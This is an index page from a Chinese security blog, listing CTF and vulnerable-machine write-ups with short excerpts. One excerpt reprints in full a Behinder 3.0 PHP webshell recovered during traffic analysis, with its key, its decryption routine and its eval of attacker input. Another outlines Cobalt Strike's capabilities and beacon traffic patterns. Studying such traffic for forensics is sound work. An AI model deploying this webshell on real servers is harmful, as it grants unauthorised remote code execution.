-
第八届 “强网杯” 全国网络安全挑战赛-Misc
附件下载见:CTF-Archives/2024-qwbs8: 第八届 “强网杯” 全国网络安全挑战赛 我专挑Misc的做,其他的做不来🤣,拿到附件打开是个流量包,看了下协议分级统计 UDP协议中的RDP包比较多,TCP有个SMB协议的 ... -
Windows11下安装WSL2_Kali踩坑记录
前言当前是我全新状态下的Windows11,在此之前我已经受够了之前那个破预览版体验计划了,我先吐槽一下这个b预览版了,某次在弹出系统更新的提示下误打误撞加入了Windows预览版体验计划,优点是我可以更早的体验更新的功能,当时推出的多标签页资源管理... -
WSL中配置Ubuntu(PWN)环境
WSL环境配置(一)Ubuntu -22.04.6 LTS更新包、安装Vim1234#更新软件源udo apt update && sudo apt upgrade -y#安装Vimsudo apt install vim 安装PW... -
2024第七届浙江省大学生网络与信息安全竞赛预赛
-
2023第六届浙江省大学生网络与信息安全竞赛-Misc
NewGrating
流量分析题
拿到附件,首先看到了文件为
蝎子.pcapng
很显然给了我们提示,大概率是冰蝎Behinder
的流量分析文件总体不大就4667个分组
我首先过滤了http流就在第一个流
stream 0
中发现传了个webshell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
@error_reporting(0);
session_start();
// $key="e45e329feb5d925b"; //........................32...md5.........16........................rebeyond
$key="e46023a69f8db309"; //DASCTF
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);这是很经典的冰蝎3.0加密算法特征,
key
给我们了就是e46023a69f8db309
密码是DASCTF
我们也可以验证一下,冰蝎的AES
密钥key
为连接密码的md5
前16位 -
2021 绿城杯 MISC
流量分析题
CobaltStrike流量特征
前言
先来了解下什么是
CobaltStrikle
下面简称CS,在我的理解就是类似于哥斯拉、中国蚁剑相类似的webshell工具,下面是互联网上的的回答,我直接沾上来Cobalt Strike是一款内网渗透测试工具,常被业界人称为CS。Cobalt Strike 2.0版本主要是结合Metasploit可以称为图形化MSF工具。而Cobalt Strike 3.0已经不再使用Metasploit框架而作为一个独立的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。客户端模式和服务端模式可以在Windows以及Linux上运行这里要注意服务端模式在Windows下运行时有可能会出现一些细小的问题不过影响不大。可以很好的解决metasploit对Windows支持不够好的问题。
Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等
其实有关CS的还有很多知识,这里贴一下别人整理好的wikiCobalt Strike | 狼组安全团队公开知识库,
这里我们需要学习的是CS的传输流量,以便可以在
wireshrak
中辨认,CS分为server和client版本,所以可以团队作业,就是很多个client都可以连接同一个server,这里我们需要了解的是Cobalt Strike
有个Beacon
命令,我们可以通过wireshark
进行分析如果你用过CrossC2这类工具你应该知道这类工具在使用时一定需要.cobaltstrike.beacon_keys文件,这是因为cobaltstrike在与Beacon通信时是使用的RSA非对称加密,而.cobaltstrike.beacon_keys文件里存储了一个序列化对象这个对象中包含着一个密钥对里面存储着RSA公私钥
在
http-beacon
通信中默认使用GET
方法向/dpixel
、/__utm.gif
、/pixel.gif
等地址发起请求,同时Cobalt Strike
的Beacon
会将元数据(例如AES密钥)使用RSA
公钥加密后发送给C2
服务器。这些元数据通常被编码为Base64
字符串并作为Cookie
发送。 -
Kali安装Anaconda
Kali安装Anaconda前言Anaconda是一个免费开源的软件包管理器和环境管理器,用于科学计算、数据分析和机器学习。它可以帮助用户在Python环境中快速安装、升级和管理各种软件包,还可以根据需要创建和管理多个Python环境。Anacond... -
攻防世界Misc - 持续更新
攻防世界 MISC流量分析题traffic拿到手,检查下包的大小,没几个想着慢慢追踪流,也能找到,后面发现方向错了 看了其他师傅的解题思路,从icmp包的大小下手 不过wireshark图形化不能批量导出包大小 但是可以通过tshark命令行工具来... -
HackMyVM-pwned靶场详解WP
信息收集服务探测这里发现开放了三个端口 1234567891011121314151617181920212223242526┌──(kali㉿kali)-[~]└─$ sudo arp-scan -l[sudo] password for kali... -
HackMyVM-Publisher解析WP
信息收集服务探测12345678910111213141516171819202122232425262728293031323334sudo arp-scan -l Interface: eth0, type: EN10MB, ...